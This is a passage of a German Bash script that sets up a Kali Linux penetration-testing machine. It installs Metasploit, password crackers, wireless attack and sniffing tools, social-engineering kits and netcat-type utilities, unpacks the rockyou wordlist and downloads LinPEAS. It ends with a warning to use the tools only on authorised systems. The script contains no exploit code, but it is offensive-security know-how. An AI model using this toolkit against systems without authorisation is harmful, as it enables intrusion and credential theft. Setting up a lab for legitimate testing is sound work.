section "Exploitation Frameworks"
EXPLOIT_TOOLS=(
metasploit-framework
beef-xss
exploitdb
)
for pkg in "${EXPLOIT_TOOLS[@]}"; do install_apt "$pkg"; done
# Metasploit Datenbank initialisieren
info "PostgreSQL für Metasploit starten..."
systemctl enable postgresql >> "$LOG_FILE" 2>&1
systemctl start postgresql >> "$LOG_FILE" 2>&1
msfdb init >> "$LOG_FILE" 2>&1 && success "Metasploit Datenbank initialisiert." || warn "msfdb init übersprungen (evtl. bereits vorhanden)."
# =============================================================================
section "Passwort-Angriffe & Cracking"
PASS_TOOLS=(
hydra
john
hashcat
medusa
cewl
crunch
ophcrack
wordlists
)
for pkg in "${PASS_TOOLS[@]}"; do install_apt "$pkg"; done
# Rockyou Wortliste entpacken
if [[ -f "/usr/share/wordlists/rockyou.txt.gz" ]]; then
info "Entpacke rockyou.txt..."
gunzip -f /usr/share/wordlists/rockyou.txt.gz >> "$LOG_FILE" 2>&1 && success "rockyou.txt entpackt." || warn "rockyou.txt bereits entpackt."
fi
# =============================================================================
section "Wireless & WLAN"
WIRELESS_TOOLS=(
aircrack-ng
wifite
kismet
reaver
pixiewps
bully
cowpatty
mdk3
mdk4
)
for pkg in "${WIRELESS_TOOLS[@]}"; do install_apt "$pkg"; done
# =============================================================================
section "Sniffing & Traffic-Analyse"
SNIFF_TOOLS=(
wireshark
tshark
tcpdump
bettercap
ettercap-graphical
dsniff
mitmproxy
responder
)
for pkg in "${SNIFF_TOOLS[@]}"; do install_apt "$pkg"; done
# =============================================================================
section "Post-Exploitation & Privilege Escalation"
POSTEX_TOOLS=(
bloodhound
neo4j
)
for pkg in "${POSTEX_TOOLS[@]}"; do install_apt "$pkg"; done
# LinPEAS herunterladen
if [[ ! -f "/opt/linpeas.sh" ]]; then
info "Lade LinPEAS herunter..."
curl -sL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -o /opt/linpeas.sh >> "$LOG_FILE" 2>&1
chmod +x /opt/linpeas.sh
success "LinPEAS nach /opt/linpeas.sh installiert."
else
warn "LinPEAS bereits vorhanden."
((SUCCESS_COUNT++))
fi
# =============================================================================
section "Forensics & Reverse Engineering"
FORENSIC_TOOLS=(
volatility3
binwalk
ghidra
radare2
foremost
scalpel
testdisk
autopsy
chkrootkit
rkhunter
)
for pkg in "${FORENSIC_TOOLS[@]}"; do install_apt "$pkg"; done
# =============================================================================
section "Social Engineering"
SE_TOOLS=(
set
gophish
)
for pkg in "${SE_TOOLS[@]}"; do install_apt "$pkg"; done
# =============================================================================
section "Extras & Hilfsmittel"
EXTRA_TOOLS=(
proxychains4
tor
macchanger
steghide
exiftool
hashid
pwncat
socat
netcat-openbsd
tmux
vim
jq
)
for pkg in "${EXTRA_TOOLS[@]}"; do install_apt "$pkg"; done
# GoWitness installieren (Go)
if ! command -v gowitness &>/dev/null; then
info "Installiere GoWitness (Go)..."
go install github.com/sensepost/gowitness@latest >> "$LOG_FILE" 2>&1 && \
cp ~/go/bin/gowitness /usr/local/bin/ 2>/dev/null && \
success "GoWitness installiert." || { error "GoWitness Installation fehlgeschlagen."; FAILED_TOOLS+=("gowitness"); }
else
warn "GoWitness bereits installiert."
((SUCCESS_COUNT++))
fi
# Caido installieren (falls im Kali-Repo vorhanden)
install_apt caido || warn "Caido nicht im Repo – manuell von caido.io installieren."
# =============================================================================
section "Aufräumen"
apt-get autoremove -y -qq >> "$LOG_FILE" 2>&1
apt-get clean >> "$LOG_FILE" 2>&1
success "Aufgeräumt."
# =============================================================================
echo ""
log "${BOLD}${GREEN}╔══════════════════════════════════════════════════════════╗${NC}"
log "${BOLD}${GREEN}║ INSTALLATION ABGESCHLOSSEN ║${NC}"
log "${BOLD}${GREEN}╚══════════════════════════════════════════════════════════╝${NC}"
log " Erfolgreich installiert: ${GREEN}${SUCCESS_COUNT} Tools${NC}"
if [[ ${#FAILED_TOOLS[@]} -gt 0 ]]; then
log " ${YELLOW}Fehlgeschlagen (${#FAILED_TOOLS[@]}):${NC} ${FAILED_TOOLS[*]}"
warn "Diese Tools manuell prüfen oder über pip/gem/go installieren."
else
log " ${GREEN}Keine Fehler – alle Tools installiert!${NC}"
fi
log ""
log " Logfile: $LOG_FILE"
log " Ende: $(date)"
log ""
log "${BOLD}Nächste Schritte:${NC}"
log " • rockyou.txt: /usr/share/wordlists/rockyou.txt"
log " • SecLists: /usr/share/seclists/"
log " • LinPEAS: /opt/linpeas.sh"
log " • Metasploit: msfconsole"
log " • GoWitness: gowitness"
log ""
log "${BOLD}${RED}WICHTIG: Nur auf eigenen/autorisierten Systemen nutzen! (§ 202a StGB)${NC}"
echo ""
✅ Einzeiler-Befehl
Das Script lokal speichern (nano kali_pentest_install.sh), Inhalt einfügen, dann ausführen:
chmod +x kali_pentest_install.sh && sudo ./kali_pentest_install.sh
Weiterführende Ressourcen